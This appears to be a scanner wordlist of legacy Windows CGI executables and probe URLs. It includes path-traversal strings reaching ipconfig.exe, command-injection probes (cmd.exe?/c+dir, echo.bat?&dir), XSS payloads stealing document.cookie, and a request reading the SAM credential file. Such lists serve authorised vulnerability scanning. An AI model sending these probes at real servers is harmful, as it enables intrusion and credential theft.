../../../../../../../../../../WINNT/system32/ipconfig.exe
Cgitest.exe
GW5/GWWEB.EXE
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
MsmMask.exe
MsmMask.exe?mask=/junk334
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
Pbcgi.exe
Webnews.exe
_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
c32web.exe/ChangeAdminPassword
cart32.exe
cfgwiz.exe
cgimail.exe
cgitest.exe
cmd.exe?/c+dir
cmd1.exe?/c+dir
dbmlparser.exe
echo.bat
echo.bat?&dir+c:\\
foxweb.dll
foxweb.exe
fpsrvadm.exe
get32.exe
hello.bat?&dir+c:\\
hpnst.exe?c=p+i=
htimage.exe
htimage.exe/path/filename?2,2
imagemap.exe
input2.bat?|dir
ion-p.exe?page=c:\winnt\repair\sam
mailform.exe
minimal.exe
mkilog.exe
mkplog.exe
perl.exe
perl.exe?-v
post16.exe
ppdscgi.exe
rguest.exe
rightfax/fuwww.dll/?
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
sensepost.exe?/c+dir
shtml.dll
test-cgi.bat
test-cgi.exe?<script>alert(document.cookie)</script>
testcgi.exe
testcgi.exe?<script>alert(document.cookie)</script>
texis.exe/junk
visadmin.exe
visitor.exe
wconsole.dll
webbbs.exe
webfind.exe?keywords=01234567890123456789
webplus.exe?about
wguest.exe
windmail.exe
